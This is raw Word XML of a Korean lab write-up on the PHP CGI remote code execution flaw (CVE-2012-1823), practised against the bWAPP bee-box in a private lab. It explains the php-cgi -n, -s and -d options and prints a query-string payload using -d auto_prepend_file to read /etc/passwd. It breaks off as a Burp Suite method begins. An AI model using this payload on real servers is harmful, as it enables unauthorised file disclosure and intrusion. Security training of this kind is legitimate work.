                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4" w:rsidRPr="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>HP CGI Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3E89" w:rsidRPr="00522648" w14:paraId="089ECC8E" w14:textId="77777777" w:rsidTr="006D3E89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41843980" w14:textId="00B3EF4A" w:rsidR="006D3E89" w:rsidRPr="00522648" w:rsidRDefault="006D3E89" w:rsidP="006D3E89">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24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522648">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">공격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개념</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3E89" w:rsidRPr="00BE7966" w14:paraId="39344A32" w14:textId="77777777" w:rsidTr="006D3E89">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AD4F43A" w14:textId="77777777" w:rsidR="008A069E" w:rsidRDefault="008A069E" w:rsidP="006D3E89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0270FC88" w14:textId="77777777" w:rsidR="008A069E" w:rsidRDefault="008A069E" w:rsidP="006D3E89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1AAE8F42" wp14:editId="24EA5230">
                  <wp:extent cx="6567170" cy="1888490"/>
                  <wp:effectExtent l="0" t="0" r="508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7170" cy="188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299EC" w14:textId="77777777" w:rsidR="008A069E" w:rsidRDefault="008A069E" w:rsidP="006D3E89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295A947C" w14:textId="4CF819BD" w:rsidR="006D3E89" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>HP C</w:t>
            </w:r>
            <w:r w:rsidR="00C81DBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>G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I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취약점(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>CVE-2012-1823)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은 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>2012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년 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1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월에 발견된 취약점으로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PHP 5.4.12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이전 버전의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sapi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cgi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chi_main.c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에서 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="00C81DBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>G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I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스크립트가 질의 문자열을 제대로 처리하지 못하여 발생한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PHP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는 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="00C81DBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>G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I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기반으로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mod_chid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라는 모듈을 사용하여 동작할 때 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>php-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cgid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>가 전달 변수를 받아서 실행한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정상적으로 동작</w:t>
            </w:r>
            <w:r w:rsidR="00084596">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 시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libphp5.so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모듈로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PHP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소스가 실행되나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php-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cgid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모듈을 이용하게 되면 파라미터 값을 실행하게 되어 예상치 못한 결과를 유발한다.</w:t>
            </w:r>
            <w:r w:rsidR="00C81DBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> CGI</w:t>
            </w:r>
            <w:r w:rsidR="00C81DBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">는 </w:t>
            </w:r>
            <w:r w:rsidR="00B71016">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Common Gateway Interface</w:t>
            </w:r>
            <w:r w:rsidR="00B71016">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>로 웹서버와 외부 프로그램 사이에서 정보를 주고받는 방법이나 규약들을 말한다.</w:t>
            </w:r>
            <w:r w:rsidR="00B71016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="00C81DBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">쉽게 말하면 웹서버에서 외부 프로그램을 실행시켜 결과를 </w:t>
            </w:r>
            <w:r w:rsidR="00C81DBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r w:rsidR="00C81DBD">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>로 돌려주는 인터페이스이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34FF68FD" w14:textId="4D64A6AA" w:rsidR="006D3E89" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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이 취약점을 활용하면 명령어 옵션을 질의 문자열에 포함하여 원격 명령을 실행하는 것이 가능해진다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="456B7F76" w14:textId="77542743" w:rsidR="006D3E89" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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원격 코드는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php-chi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명령어의 다음 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>3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개 옵션을 주로 이용한다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27"/>
              <w:gridCol w:w="5228"/>
            </w:tblGrid>
            <w:tr w:rsidR="006D3E89" w14:paraId="48D19519" w14:textId="77777777" w:rsidTr="006D3E89">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5227" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4805ABA2" w14:textId="33F01445" w:rsidR="006D3E89" w:rsidRPr="001A774C" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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-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n</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5228" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1C96308F" w14:textId="091B3B7C" w:rsidR="006D3E89" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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Php.ini 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파일을 사용하지 않는다</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="006D3E89" w14:paraId="165494AB" w14:textId="77777777" w:rsidTr="006D3E89">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5227" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2B51ADEF" w14:textId="4BB372D6" w:rsidR="006D3E89" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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-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s</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5228" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="778A7918" w14:textId="0A7C9453" w:rsidR="006D3E89" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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소스 코드에 색을 반영하여 보여준다.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="006D3E89" w14:paraId="7552FD59" w14:textId="77777777" w:rsidTr="006D3E89">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5227" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="45D81CD7" w14:textId="1E3FA87C" w:rsidR="006D3E89" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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-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d</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5228" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0ED75134" w14:textId="070DD73C" w:rsidR="006D3E89" w:rsidRPr="001A774C" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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Php.ini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에 정의된 설정 내용을 임의로 설정한다.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="314EDB00" w14:textId="77777777" w:rsidR="006D3E89" w:rsidRPr="00BE7966" w:rsidRDefault="006D3E89" w:rsidP="006D3E89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61F3B49C" w14:textId="77777777" w:rsidTr="0058148E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6C4B1711" w14:textId="6E425F1D" w:rsidR="008D5D37" w:rsidRDefault="008D5D37" w:rsidP="008D5D37">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="360"/>
              <w:jc w:val="righ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실습</w:t>
            </w:r>
            <w:r w:rsidR="00D81979"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환경</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10BC041F" w14:textId="6F633EB4" w:rsidR="00440B6B" w:rsidRDefault="00440B6B" w:rsidP="00B71016">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="360"/>
              <w:jc w:val="righ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공격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PC(Kali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linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>) :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.0.90/24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="108BE598" w14:textId="25CEFC91" w:rsidR="006D3E89" w:rsidRPr="00BE7966" w:rsidRDefault="00440B6B" w:rsidP="00B71016">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="360"/>
              <w:jc w:val="righ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대상</w:t>
            </w:r>
            <w:r w:rsidR="008D5D37">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> PC(</w:t>
            </w:r>
            <w:r w:rsidR="008A069E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidR="008A069E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ee box</w:t>
            </w:r>
            <w:r w:rsidR="008D5D37">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">): </w:t>
            </w:r>
            <w:r w:rsidR="008A069E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>192.168.0.9</w:t>
            </w:r>
            <w:r w:rsidR="008D5D37">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/2</w:t>
            </w:r>
            <w:r w:rsidR="008A069E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050741D" w14:paraId="41FE8A28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017F428" w14:textId="67F409AA" w:rsidR="008D5D37" w:rsidRPr="00522648" w:rsidRDefault="008D5D37" w:rsidP="00522648">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24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522648">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>공격 수행</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050741D" w14:paraId="2AFF79F2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62F817F1" w14:textId="77777777" w:rsidR="00B71016" w:rsidRDefault="00B71016" w:rsidP="001A774C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  <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Beebox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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의 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admin 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디렉터리가 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>CHI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모드에서 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>PHP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모드를 사용하고 있다는 정보가 주어진다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0840F15B" w14:textId="455B6466" w:rsidR="001A774C" w:rsidRDefault="00B71016" w:rsidP="001A774C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  <w:proofErr w:type="gramStart"/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admin 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을</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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클릭하게 되면 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>phpinfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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페이지를 확인할 수 있으며,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 SERVER API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로 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>CGI/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>FastCGI</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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를 사용하는 것을 확인 할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CD0781C" w14:textId="7DFE9640" w:rsidR="00B71016" w:rsidRDefault="00B71016" w:rsidP="001A774C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/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2972F1B0" wp14:editId="4C5FC4F1">
                  <wp:extent cx="4227830" cy="308610"/>
                  <wp:effectExtent l="0" t="0" r="127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783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D721AB" w14:textId="21FD072A" w:rsidR="00B71016" w:rsidRDefault="00B71016" w:rsidP="001A774C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/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C5856B2" wp14:editId="111332A9">
                  <wp:extent cx="5972810" cy="2339439"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="381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0996" cy="2354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CB12FE" w14:textId="2587A65D" w:rsidR="00084596" w:rsidRDefault="00084596" w:rsidP="001A774C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본래,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해당 웹 사이트에서 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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우클릭</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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-&gt; 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페이지 소스 보기를 통해서 소스를 확인할 경우 다음과 같은 기본적인 웹 사이트 소스만 출력된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6839058E" w14:textId="77777777" w:rsidR="00084596" w:rsidRDefault="00084596" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="60D1D5D8" w14:textId="11A4540C" w:rsidR="00084596" w:rsidRDefault="00084596" w:rsidP="001A774C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/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C41478E" wp14:editId="288B4075">
                  <wp:extent cx="5961380" cy="1881505"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="444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3589" cy="188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0E445F" w14:textId="77777777" w:rsidR="00084596" w:rsidRDefault="00084596" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="03089893" w14:textId="7161D0A4" w:rsidR="008C1158" w:rsidRDefault="00084596" w:rsidP="001A774C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그러나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>Php-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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chi 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의</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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>-s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옵션을 사용하게 된다면 다음과 같은 핵심 소스코드를 얻을 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508E2581" w14:textId="77777777" w:rsidR="00084596" w:rsidRDefault="00084596" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="52EF9DFB" w14:textId="559391CF" w:rsidR="00084596" w:rsidRDefault="00084596" w:rsidP="001A774C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/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13AD1FF7" wp14:editId="013491CA">
                  <wp:extent cx="5961380" cy="2891790"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="381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7124" cy="290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BF475F" w14:textId="194DA6F1" w:rsidR="00084596" w:rsidRDefault="00084596" w:rsidP="001A774C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</w:p>
          <w:p w14:paraId="7FDDE3A2" w14:textId="77777777" w:rsidR="00FB1212" w:rsidRDefault="00084596" w:rsidP="00FB1212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다음은 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>-d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와 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-n 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옵션을 통해 실질적인 정보를 탈취해보도록 한다. 총 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>2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가지 방법이 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA6CED3" w14:textId="77777777" w:rsidR="00FB1212" w:rsidRDefault="00FB1212" w:rsidP="00FB1212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</w:p>
          <w:p w14:paraId="101518B7" w14:textId="3FB6A362" w:rsidR="00084596" w:rsidRPr="00FB1212" w:rsidRDefault="00FB1212" w:rsidP="00FB1212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(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1) </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB1212">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r w:rsidR="00084596" w:rsidRPr="00FB1212">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">RL </w:t>
            </w:r>
            <w:r w:rsidR="00084596" w:rsidRPr="00FB1212">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>수정을 통</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB1212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해 </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB1212">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">passwd </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB1212">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>파일 탈취</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3573D962" w14:textId="35F62A04" w:rsidR="00FB1212" w:rsidRPr="00FB1212" w:rsidRDefault="00FB1212" w:rsidP="00084596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다음과 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>같이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</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB1212">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>URL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에 명령어를 삽입</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB1212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하여 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passwd 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파일을 탈취할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38D7B0A8" w14:textId="1EC6739E" w:rsidR="00FB1212" w:rsidRPr="00FB1212" w:rsidRDefault="00AC76C2" w:rsidP="00084596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color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>http://[</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC76C2">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>eebox</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>_ip]</w:t>
            </w:r>
            <w:r w:rsidR="00FB1212" w:rsidRPr="00FB1212">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/bWAPP/admin</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00FB1212" w:rsidRPr="00FB1212">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/?-</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00FB1212" w:rsidRPr="00FB1212">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>d+auto_prepend_file%3d/etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DAC4058" w14:textId="759B0892" w:rsidR="00FB1212" w:rsidRDefault="00FB1212" w:rsidP="00084596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이때,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 +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는 공백을 의미하며,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b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>auto_prepend_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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은 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PHP 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파일 실행 전에 지정한 파일을 실행시키는 문구이다.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 3d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같은 경우 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>16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진수 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>ASCII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코드이며,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이는 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‘=’을 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의미한다.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즉,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 PHP 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파일 실행 전에 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>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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/passwd 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파일을 실행시키는 문구이다.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이렇게 시행했을 경우,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서버는 다음과 같은 결과를 출력하게 된다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A4CF9C" w14:textId="77777777" w:rsidR="00FB1212" w:rsidRDefault="00FB1212" w:rsidP="00084596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</w:p>
          <w:p w14:paraId="2BC7CA4F" w14:textId="065967E5" w:rsidR="00FB1212" w:rsidRDefault="00FB1212" w:rsidP="00084596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/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F4B3EE3" wp14:editId="58C99838">
                  <wp:extent cx="5961413" cy="1977390"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="381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86" cy="199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14DA27" w14:textId="2AA9079A" w:rsidR="00FB1212" w:rsidRPr="00FB1212" w:rsidRDefault="00FB1212" w:rsidP="00084596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(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>2) Burp Suite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을 활용한 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passwd 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파일 탈취</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3224C1A6" w14:textId="5FC63436" w:rsidR="00440B6B" w:rsidRDefault="00FB1212" w:rsidP="00440B6B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먼저 공격p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>c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인 칼리에서 프록시 설정 후,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 burp suite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을 켜준다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51CDECC2" w14:textId="29479DB9" w:rsidR="00FB1212" w:rsidRDefault="00FB1212" w:rsidP="00440B6B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lastRenderedPageBreak/>
